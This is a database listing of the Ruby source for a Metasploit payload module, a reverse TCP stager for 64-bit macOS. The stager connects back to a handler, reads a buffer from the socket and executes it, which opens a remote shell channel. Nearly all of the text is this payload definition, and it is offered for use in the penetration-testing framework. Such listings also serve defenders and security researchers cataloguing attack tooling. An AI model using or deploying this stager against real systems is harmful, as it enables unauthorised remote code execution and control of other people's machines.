Lucene search

K
metasploitNemo, nemo <[email protected]>MSF:PAYLOAD-OSX-X64-DUPANDEXECVE-REVERSE_TCP-
HistorySep 22, 2012 - 1:31 p.m.

OS X dup2 Command Shell, Reverse TCP Stager

2012-09-2213:31:42
nemo, nemo <[email protected]>
www.rapid7.com
17

dup2 socket in edi, then execve. Connect, read length, read buffer, execute

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = 168

  include Msf::Payload::Osx::ReverseTcp_x64
  include Msf::Payload::TransportConfig
  include Msf::Payload::Stager

  def initialize(info = { })
    super(merge_info(info,
      'Name'        => 'Reverse TCP Stager',
      'Description' => 'Connect, read length, read buffer, execute',
      'Author'      => 'nemo <nemo[at]felinemenace.org>',
      'License'     => MSF_LICENSE,
      'Platform'    => 'osx',
      'Arch'        => ARCH_X64,
      'Handler'     => Msf::Handler::ReverseTcp,
      'Stager'      => { 'RequiresMidstager' => false }, # Originally set to true, but only Linux payloads use this at the moment, not OSX.
      'Convention'  => 'sockedi',
    ))
  end

  def generate(opts = {})
    generate_reverse_tcp(opts)
  end

end